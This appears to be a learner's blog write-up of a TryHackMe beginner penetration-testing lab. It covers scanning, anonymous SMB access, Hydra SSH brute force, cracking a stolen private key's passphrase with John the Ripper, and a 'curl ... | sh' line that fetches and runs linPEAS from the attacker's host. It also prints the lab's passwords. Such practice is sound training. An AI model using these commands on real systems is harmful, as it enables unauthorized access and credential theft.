I decided to start working on some of THM’s machines. I did the Pickle Rick Machine a little while ago which was fun so I figured I would give the other ones a shot. What better way than to start with the first and easiest (supposedly)? Overall, it was good. It makes me realize I still have a lot to learn but practice makes perfect.
Here is the link to my original notes for the labs in case anyone is interested in my thought process. This write-up will be more of a straightforward approach to how I tackled the lab.
So let’s get started.
Task 1: Discover what services are running on the machine.
The first step is pretty easy, just run a simple nmap scan.
nmap [Target URL]

Task 2: What is the name of the hidden directory on the web server?
Since Port 80 is open, it’s usually an indicator that a web server is running. Visiting the URL takes us to an “Under Construction” webpage. Let’s run a gobuster enumeration on the page to try to discover some other directories.
gobuster dir -u http://[Target_IP]:[Port]/ -w [Path to word list]

The “/index” page is just the home page that is under construction. The other directories have a 403 code which means they are forbidden to access. That leaves us with one directory left “/development“.

Task 3: Use Brute forcing to find the username and password.
So I didn’t brute force the usernames. Since I had access to quite a few files from the directory we found above and some other services from the nmap scan, I decided to do some snooping.
I started by exploring the two files from the directory above.

Three useful bits of information.
- There are two possible usernames that start with J & K.
- SMB has been configured. This lines up with the service running on Port 445 from the scan above.
- User “J” has weak credentials. A good indication of which user we are going to try brute forcing.
Let’s start with exploring SMB on Port 445.
smbclient -L [Target URL]

It shows that an Anonymous Share is available. Let’s take a look in there as this share tends to be available without credentials.
smbclient //[Target URL]/Anonymous

It looks like there is a file in there that we can grab and take a look at it.
get staff.txt

If we “cat” this file out it gives us the first bit of information we were looking for. Two names, “Jan” and “Kay“.
For the time being, let’s assume that these are possible usernames on the system.
Now that we have a couple of possible usernames let’s see what we can do with those. Based on our first nmap scan, we found that SSH is running on Port 22. If these are usernames, it’s a pretty good chance that we may be able log into them from Port 22.
If we try logging in to SSH with Jan, we quickly find that we need a password. So let’s give our good friend Hydra a tryout. I had to look up a hint on this one. I was a little hyper-focused on the SMB server and originally forgot about Port 22. Good reminder to myself to back up sometimes and see what other possible routes I can take.
hydra -V -l jan -P [password list] ssh://[Target IP]
I used the rockyou password file which was overkill and took a bit of time but eventually came up with a password for the user. Per the /development directory word files, it appears that Jan’s credentials are pretty weak.

Now we have a password of “armando“.
Task 4: What is a username?
We already figured that out from the previous.
Task 5: What is the password?
Same as before, we already figured this out from the previous task.
Task 6: What service do you use to access the server?
Luckily for us, we also figured this out from Task 3.
Task 7: Enumerate the machine to find any versions for privilege escalation.
Before I ran any enumeration scripts, I decided to just explore myself. I really enjoy this part once I get access to a machine. It’s fun to run around a system and see what opportunities are possible.
Exploring the system gave me a lot of good info but I decided to start by focusing on Kay’s file. Listing out their files (including the hidden ones) gave me a lot of good information.

Most of this, we can’t do a whole lot with but the important file in there is in the .ssh directory.

It looks like Kay has both the private and public keys saved on their machine. That is a big no-no.
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
Here is where I learned that I can log into SSH with a private key which is really cool. I started by creating a new file on my host machine.
nano id_rsa.pem
I copy and pasted the private key into this file, saved it, and exited. Next, I tried logging into the SSH server with the private key.
ssh -i id_rsa.pem kay@[Target IP]

Unfortunately, it looks like I need a passphrase to continue to log in. This is great information and we’ll come back to it later but let’s get back to the task at hand.
Let’s get back to focusing on the task of enumerating the machine.
Start by downloading linPEAS if you don’t already have it installed.
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
This will download the file and save the output to linpeas.sh. Next is to start up a Python web server from the directory that you downloaded linPEAS to on your host machine.
sudo python3 -m http.server 80
On the target machine (Ensure you are currently SSH’d into Jan’s account) run the following:
curl [Host IP]/linpeas.sh | sh
This will grab the linpeas.sh file from your web server and run it on the target machine. This will output a ton of good information in an easy-to-read format. This is where I discovered a vulnerability in the machine (CVE 2021-4034) and it also outputted the private keys I previously discovered.
Task 8: What is the name of the other user?
This should be pretty easy since we already discovered this from a previous task.
Task 9: If you found this user, what can you do with this information?
Well honestly, a lot. But I think they are getting at lateral movement in the system. In this case, Kay has a lot of root privileges, so it would be worth it to try to gain access to their account.
Task 10: What is the final password you obtain?
Let’s jump back to Task 7 from above.
I needed my second hint here as I had no idea what to do about the passphrase to Kay’s account. I spent a couple of hours but was looking in all the wrong places. Turns out our buddy John (not John Hammond) is here to help us out.
I learned that we can actually obtain the passphrase from the private key. Pending the passphrase is something relatively simple. To do this, we will use John the Ripper. The first step is to convert the private key file from above, id_rsa.pem, to a format that John can try to crack.
Start by downloading the file ssh2john.py to a file on your host machine if you don’t already have it.
Next is to run the id_rsa.pem file through the Python Script.
python3 [File path to ssh2john.py] [File path to id_rsa.pem] > john.txt
This will output a new file called “john.txt” which John the Ripper can read and try to extract a passphrase from.
john [Path to the john.txt file] --wordlist=[Path to wordlist you want to use]
Running this through the John the Ripper will output a passphrase at the end of “beeswax‘. Let’s give that a try now.
ssh -i [Path to private key] kay@[Target IP]
When prompted for the passphrase, input beeswax and you should now be logged into Kay’s account.
Stroll on over to Kay’s user account and cat the backup file:
cat /home/kay/pass.bak
This will output:
And that is it. Nothing more to it.
I needed two hints to get through this lab but as everyone says, practice makes perfect. I’ll try taking a crack at another lab tomorrow and will follow up with a write-up a day or two afterward so keep your eyes open for it.
As always, thanks for reading and catch you all later.